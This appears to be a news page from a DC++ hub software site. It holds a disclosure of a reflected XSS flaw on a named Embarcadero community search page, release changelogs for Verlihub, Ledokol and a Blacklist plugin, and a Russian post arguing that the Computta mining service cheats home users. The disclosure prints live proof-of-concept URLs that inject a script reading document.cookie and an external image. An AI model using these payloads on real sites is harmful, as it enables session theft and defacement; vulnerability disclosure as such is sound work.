News
Work
Network
Forum
Gallery
Hublist
Tools
Statistics
About
Login
Embarcadero community XSS bug
Vulnerable page: https://community.embarcadero.com/PoC
https://community.embarcadero.com/blogs/blog-menu?search="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>
PoC
https://community.embarcadero.com/blogs/blog-menu?search="><script>alert(document.cookie)</script>
You can either include any XSS code in search input box, or request any XSS code directly using GET method and search parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Verlihub 1.1.0.0
Changes in 1.1.0.0
Commit log: https://github.com/verlihub/verlihub/commits/master
File information: Verlihub 1.1.0.0
Ledokol 2.9.5.70
Changes in 2.9.5.70
[ 63] Fixed: Operator list appearance after removing user with opkeyclass condition, report by KCAHDEP[ 64] Added: CTM uptime with actions
[ 65] Added: More keywords to AVDB search server requests
[ 65] Added: Optional path parameter to avdetforce command
[ 66] Added: Command notification for custom nick change, request by KCAHDEP
[ 67] Added: Main chat rank prize as higher user class defined by configuration, idea by Foxtrot
[ 68] Added: Updated country code list after MaxMindDB names
[ 69] Added: Search and CTM uptime user message control, request by KCAHDEP
File information: Ledokol 2.9.5.70
Blacklist 1.2.3.2
Changes in 1.2.3.2
# 1.2.2.7 - Added country code translation to some messages# 1.2.2.8 - Added "prox_quote" configuration to limit amount of public proxy lookups per day
# 1.2.2.9 - Added prioritization of public proxy and my lists
# 1.2.2.9 - Removed break on first match
# 1.2.2.9 - Added "prox_getasn" configuration to show GeoIP ASN information on proxy detection
# 1.2.2.9 - Added "extry_getasn" configuration to show GeoIP ASN information on exception lookup
# 1.2.3.0 - Added "myoff" and "exoff" commands to disable or enable items in my and exception lists
# 1.2.3.0 - Added results from my list to find action
# 1.2.3.0 - Added ASN check on connection
# 1.2.3.1 - Added "asn_block" configuration for space separated list of blocked AS numbers
# 1.2.3.1 - Added "asn_except" configuration for space separated list of excepted AS numbers
# 1.2.3.2 - Added "nick_skip" configuration for space separated list of users to skip proxy lookup
File information: Blacklist 1.2.3.2
Вся правда о Computta и подобных ему сервисов для обычных пользователей - нас с вами
Доброго времени.
Испытал я этот Computta майнер на себе, и хочу привести для вас немного реальной статистики обычного пользователя, с обычным среднестатистическим компьютером, не для профессионалов с профессиональным дорогим оборудованием. Начнём с того что у большинства пользователей обычный компьютер, примерно как у меня, или даже хуже:
Вчера весь вечер перезапускал бенчмарк, обновлял драйверы для моей графической карты, в надежде выжать максимум из моего обычного компьютера. Вот результаты самых высоких значений:
Скорее всего это ещё не о чём не говорит. Вы скажете "ну это приблизительно" и "за очень короткое время". Хорошо, запустил я значит этот майнер также вчера вечером, оказалось что моя простая графическая карта вообще не способна на хорошие результаты, потому программа использует только центральный процессор. В дебаг логах нашёл следующую ошибку:
Code
01:23:52.072 DEBUG [c.y.c.m.impl.XmrClMiner-GPU-0.3] OUT: [01:23:52] Error -61 when calling clCreateBuffer to create hash scratchpads buffer
Кстати именно отсюда и узнал какой майнер на самом деле использует этот проект Computta: github/OhGodAPet/wolf-xmr-miner/issues/9. Ладно, это уже отдельный разговор, двигаемся далее.
При регистрации вам "бесплатно" дают 1 mBTC, потому в дальнейших вычислениях можно свободно вычитать его из общей добычи.
Запустил майнер, внимание, на полную мощность, это значит что все 4 ядра работают на 100%. Утром когда я встал, а всего прошло ровно 6 часов, я первым делом побежал к компьютеру, и вот что увидел:
За 6 часов беспрерывной работы я накопал 0.0025 mBTC. Опять ничего не понятно, то-ли мало, то-ли нормально. Ладно, тут я решил немного посчитать. И так, если 6 часов делают 0.0025 mBTC то 24 часа делают следующее:
Code
0.0025 mBTC * 4 раза (по 6 часов) = 0.01 mBTC
Это один полный день при загруженности в 100% - наверное много электроэнергии. Поехали дальше. Допустим перед нами стоит задача добыть 1 mBTC, и так считаем:
Code
0.01 mBTC * 100 дней = 1 mBTC
100 дней чтобы добыть 1 mBTC. На сайте Computta сказано что минимальная сумма для снятия равна 10 mBTC:
Quote
We have a minimum required amount for withdrawal of only 10 mBTC
10 mBTC, ну ладно, погнали считать дальше если до сих пор не ясен итог. Не забываем что у нас уже есть 1 халявный mBTC:
Code
100 дней * 9 mBTC = 900 дней
Жесть, 900 дней чтобы снять добытые монеты - в году всего 365 дней. Итого:
Нам нужно потратить 2.5 года - два с половиной года, при этом майнить каждый день, каждую секунду, используя свой процессор на 100%, чтобы заработать эти сраные 10 mBTC. Но это ещё не всё, давайте переведём mBTC в реальные BTC для того чтоб понять сколько мы заработали за 2.5 года:
Code
1 mBTC = 0.001 BTC
Берём наши 10 mBTC и получаем следующий результат:
Code
0.001 BTC * 10 штук = 0.01 BTC
Посмотрим на официальный курс BTC на данный момент в Google:
Вы видите что там написано? Просто допустим что курс не меняется все эти 2.5 года, вы за всё это время заработаете 10.000 рублей - десять тысяч рублей. Теперь посчитайте сколько электроэнергии вы потратите за всё это время, сколько вы за неё заплатите. Сколько из вас меняет пасту раз в пол года у себя на процессоре? 5% людей это делает. Вы на самом деле спалите себе компьютер и останетесь ни с чем.
Почему ни с чем - спросите вы. Да потому что все эти заработанные 1-3 или больше mBTC вы даже не сможете снять и перевести себе в кошелёк, не забывайте что их надо добыть минимум 10.
Но вот что меня затрагивает больше всего:
Через полгода когда вы бросите это дело, на вашем счету Computta будут лежать заработанные до сих пор 1-3 mBTC. Один прекрасный день, чувак написавший эту программу почистит все ваши счета т.к. вы не смогли с них снять, и даже если взять 10.000 пользователей из которых у каждого осталось по 3 mBTC на счету:
Code
10.000 счетов * 3 mBTC = 30.000 mBTC = 30 BTC = 31.174.791 RUB
Опять же, используем курс в данную минуту. Ребята, 30 миллионов рублей за пол года всего с 10.000 пользователей - а их скорее всего в десятки или сотни раз больше во всём мире.
Теперь вам ясно как люди у которых есть мозги и воля наеб*ть обычных людей с обычными компьютерами, зарабатывают миллиарды? Хватит кормить их. За счёт этого и работает весь рынок майнинга для домашних пользователей. Таких сервисов тысячи, в каждой стране по сотне, и на каждый сервис есть своя аудитория.
Эту тему можно продолжать ещё дальше, например главная замануха - приглашения друзей-друзей, так называемые рефералы. За счёт этих рефералов и растёт количество пользователей которое я упомянул выше, и оно приумножается ещё в сотни, может быть тысячи раз.
Короче, респект всем биткоинерам, не дайте этим толстосумам обмануть вас, не пользуйтесь подобными схемами. Делайте деньги более умными и доступными для обычных людей способами.